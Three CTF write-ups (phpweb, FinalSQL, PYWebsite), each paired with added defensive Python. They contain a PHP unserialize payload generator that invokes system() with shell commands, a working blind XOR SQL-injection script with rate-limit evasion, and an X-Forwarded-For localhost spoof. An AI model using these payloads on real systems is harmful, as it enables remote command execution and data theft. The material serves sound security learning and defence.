[Wangding Cup 2020, Zhuque group] phpweb
F12 shows the page sending POST data.
Have a look at it in HackBar.
The backend passes the two fields to call_user_func(), so use file_get_contents to read index.php.
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
A whole pile of functions is disabled, so we bypass it with serialization: unserialize is not on the list, and Test::__destruct calls gettime() with whatever func the object carries.
Looked through all sorts of directories without finding the flag; in the end had to use find.
<?php
// Payload generator: only the properties end up in the serialized string, so the
// server-side __destruct (which needs gettime()) is not reproduced here.
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
}
$a = new Test();
//$a->p = 'find / -name "*flag*"';
$a->p = 'cat /tmp/flagoefiu4r93';
$a->func = 'system';
print_r($a);
print_r(urlencode(serialize($a)));
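As an added illustration (not part of the writeup or the challenge code), the following Python reproduces the check index.php makes and then looks inside the p parameter the way a request filter on the defending side would. The point it makes: the blacklist only ever sees the outer func, so "unserialize" passes, while the func stored in the serialized object is never checked. The parser covers the PHP serialization types N, b, i, d, s, a and O; the DISABLE_FUN set is copied from the page's source, the sample payload is constructed (with a harmless "id" in p), and everything else is an assumption of the example.

```python
from urllib.parse import unquote_plus

# Blacklist copied from the challenge's index.php, exactly as it appears there
# (including the misspelt "registregister_shutdown_function").
DISABLE_FUN = {
    "exec", "shell_exec", "system", "passthru", "proc_open", "show_source",
    "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch",
    "escapeshellcmd", "escapeshellarg", "assert", "substr_replace",
    "call_user_func_array", "call_user_func", "array_filter", "array_walk",
    "array_map", "registregister_shutdown_function", "register_tick_function",
    "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
    "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents",
}

# Constructed sample value for p: the page's Test object, URL-encoded the way
# urlencode(serialize($a)) prints it, with a harmless "id" as the argument.
SAMPLE_P = ("O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A2%3A%22id%22%3B"
            "s%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D")


def parse_php(s, i=0):
    """Parse one PHP-serialized value at s[i]; return (value, index after it).
    Objects become dicts with a '__class__' entry, arrays become dicts keyed
    by their PHP keys. String lengths are byte lengths, so decode with latin-1."""
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in "bid":                                 # b:1;  i:42;  d:1.5;
        end = s.index(";", i)
        raw = s[i + 2:end]
        return {"b": lambda r: r == "1", "i": int, "d": float}[t](raw), end + 1
    if t == "s":                                   # s:<len>:"<bytes>";
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                          # skip ':"'
        return s[start:start + length], start + length + 2
    if t in "aO":                                  # a:<n>:{..}  O:<len>:"<class>":<n>:{..}
        out = {}
        if t == "O":
            colon = s.index(":", i + 2)
            name_len = int(s[i + 2:colon])
            out["__class__"] = s[colon + 2:colon + 2 + name_len]
            j = colon + 2 + name_len + 2           # now at the member count
        else:
            j = i + 2
        colon = s.index(":", j)
        count = int(s[j:colon])
        j = colon + 2                              # skip ':{'
        for _ in range(count):
            key, j = parse_php(s, j)
            val, j = parse_php(s, j)
            out[key] = val
        return out, j + 1                          # skip '}'
    raise ValueError(f"unsupported type tag {t!r} at offset {i}")


def blacklisted_strings(value, hits=None):
    """Collect every string anywhere inside a parsed value that names a disabled function."""
    hits = [] if hits is None else hits
    if isinstance(value, dict):
        for v in value.values():
            blacklisted_strings(v, hits)
    elif isinstance(value, str) and value.lower() in DISABLE_FUN:
        hits.append(value)
    return hits


def inspect_request(func, p):
    """Apply the same outer check as index.php, then, when func is unserialize,
    report what the object in p would hand to gettime() through __destruct."""
    func = func.lower()                            # index.php lower-cases func first
    report = {"outer_func": func, "outer_blocked": func in DISABLE_FUN,
              "embedded_class": None, "embedded_blacklisted": [], "parse_error": False}
    if not report["outer_blocked"] and func == "unserialize":
        try:
            # $_REQUEST has already URL-decoded the value; latin-1 keeps byte
            # lengths (and the \0 markers of protected/private members) intact.
            obj, _ = parse_php(unquote_plus(p, encoding="latin-1"))
        except (ValueError, IndexError):
            report["parse_error"] = True
            return report
        if isinstance(obj, dict):
            report["embedded_class"] = obj.get("__class__")
            report["embedded_blacklisted"] = blacklisted_strings(obj)
    return report


if __name__ == "__main__":
    print(inspect_request("unserialize", SAMPLE_P))
```

Run as a script it prints the report for the constructed payload: the outer check passes and the embedded func is "system". A whitelist of the few func values the page actually needs (date and the like) would make this inspection unnecessary, which is the usual fix for this class of blacklist.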
[Geek Challenge 2019] FinalSQL
Logging in after opening the site went nowhere; then found an injection point on another page, and eventually found that XOR injection works (1^1^1=1, 1^0^1=0).
On to the script.
import requests as res
import time

url = 'http://89f27319-5436-4c7b-ae35-3b038bfdb4e2.node3.buuoj.cn/search.php?id='
rs = ''
for i in range(1, 50):
    # binary search over the printable ASCII range for character i
    high = 127
    low = 32
    mid = (high + low) // 2
    while high > low:
        payload = '1^(ascii(substr((select(group_concat(password))from(F1naI1y)where(username=\'flag\')),%d,1))>%d)^1' % (i, mid)
        #payload = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'F1naI1y\')),%d,1))>%d)^1' % (i, mid)
        r = res.get(url + payload)
        time.sleep(1)  # slow down, otherwise the server bans the client
        print(payload)
        if 'NO! Not this! Click ot' in r.text:
            low = mid + 1  # the character is greater than mid
        else:
            high = mid
        mid = (high + low) // 2
    rs += chr(mid)
    print("[+]:", rs)
The table turned out to have Id, username and password, and username has a row 'flag', so just read its password. Remember the delay here, otherwise the requests come too fast and you get banned.
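Seen from the server side, a loop like the script above leaves a distinctive trace: a burst of requests from one address whose id parameter differs only in the position and threshold numbers of the probe. The following Python is an added example (not from the writeup) that parses constructed access-log lines, matches the URL-decoded query against a few signatures for that probe shape, and reports sources exceeding a burst threshold inside a time window. The log lines, table name, window and threshold are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus, urlsplit

# Signatures for the probe shape used by the script above: a boolean expression
# XOR-wrapped around a subselect that reads one character at a time.
SIGNATURES = {
    "xor_wrapped_expr": re.compile(r"\^\s*\(|\bxor\b", re.I),
    "ascii_substr": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "schema_probe": re.compile(r"information_schema|group_concat", re.I),
}

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)')

# Constructed probe path (generic table name, not the challenge's) and
# constructed access-log lines: 10.0.0.7 runs a probe loop one second apart,
# 10.0.0.9 is an ordinary visitor.
PROBE = "/search.php?id=1%5E(ascii(substr((select(password)from(users)),1,1))%3E{})%5E1"
LOG_LINES = [
    '10.0.0.7 - - [12/Mar/2021:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Mar/2021:10:00:02 +0000] "GET {} HTTP/1.1" 200 480'.format(PROBE.format(79)),
    '10.0.0.7 - - [12/Mar/2021:10:00:03 +0000] "GET {} HTTP/1.1" 200 480'.format(PROBE.format(103)),
    '10.0.0.7 - - [12/Mar/2021:10:00:04 +0000] "GET {} HTTP/1.1" 200 480'.format(PROBE.format(91)),
    '10.0.0.9 - - [12/Mar/2021:10:00:05 +0000] "GET /search.php?id=5 HTTP/1.1" 200 530',
]


def matched_signatures(path):
    """Names of the signatures that match the decoded query string of a request path."""
    query = unquote_plus(urlsplit(path).query)
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def parse_line(line):
    """Split one combined-format log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status), "size": int(size)}


def scan_log(lines, window=timedelta(seconds=60), threshold=3):
    """Flag each source whose signature-matching requests reach `threshold`
    inside any `window`. A blind-injection loop is recognisable less by a single
    request than by the burst of near-identical ones, hence the per-source count."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sigs = matched_signatures(rec["path"])
        if sigs:
            by_ip[rec["ip"]].append((rec["time"], sigs))
    findings = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        best, start = 0, 0
        for end in range(len(events)):            # sliding window over sorted times
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            findings[ip] = {"burst": best,
                            "signatures": sorted({s for _, sigs in events for s in sigs})}
    return findings


if __name__ == "__main__":
    print(scan_log(LOG_LINES))
```

The per-source burst count is what separates this from an ordinary search containing a caret: one matching request is a weak signal, three in a minute that differ only in the numbers is the loop. Lower the threshold or widen the window if the attacker adds a delay like the `time.sleep(1)` above.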
[MRCTF2020] PYWebsite
"Buy it now" wants me to scan a QR code to purchase; it won't give it to me and tells me to think it over properly. Furious, shaking, cold.
function enc(code){
    hash = hex_md5(code);
    return hash;
}
function validate(){
    var code = document.getElementById("vcode").value;
    if (code != ""){
        if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
            alert("您通过了验证!");
            window.location = "./flag.php"
        }else{
            alert("你的授权码不正确!");
        }
    }else{
        alert("请输入授权码");
    }
}
The source reveals how the validation works. Opening /flag.php, it says it checks the IP, so adding an X-Forwarded-For: 127.0.0.1 header gets straight through.
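The header trick at the end works because flag.php believes X-Forwarded-For from anyone. The Python below is an added example (not the challenge's code) that puts that naive resolution beside the usual fix: honour the header only when the TCP peer is a known reverse proxy, and then take the right-most address that a trusted proxy did not append, since everything to the left of it is client-controlled. The TRUSTED_PROXIES range and the sample addresses are assumptions made for the example.

```python
import ipaddress

# Reverse proxies whose X-Forwarded-For we are willing to believe (constructed).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]


def naive_client_ip(remote_addr, headers):
    """What flag.php apparently does: trust the header whenever it is present."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr


def client_ip(remote_addr, headers, trusted=TRUSTED_PROXIES):
    """Resolve the client address without trusting arbitrary senders.
    If the socket peer is not a trusted proxy the header is ignored outright.
    Otherwise walk the chain from the right, skipping addresses that trusted
    proxies appended; the first untrusted one is the real client."""
    peer = ipaddress.ip_address(remote_addr)
    if not any(peer in net for net in trusted):
        return remote_addr
    xff = headers.get("X-Forwarded-For", "")
    chain = [hop.strip() for hop in xff.split(",") if hop.strip()]
    for hop in reversed(chain):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr          # malformed header: fall back to the socket peer
        if not any(addr in net for net in trusted):
            return hop
    return remote_addr                  # only proxies in the chain: report the peer


def is_local(remote_addr, headers, naive=False):
    """The check flag.php performs, using either resolver."""
    resolver = naive_client_ip if naive else client_ip
    return ipaddress.ip_address(resolver(remote_addr, headers)).is_loopback


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("naive:", is_local("203.0.113.5", spoofed, naive=True))   # True: the bypass
    print("fixed:", is_local("203.0.113.5", spoofed))               # False
```

Run directly it shows the same spoofed header passing the naive check and failing the fixed one. When the application sits behind a proxy, configure the proxy to overwrite (not append to) the header, or use the proxy's own mechanism such as Apache's mod_remoteip, rather than parsing it in application code.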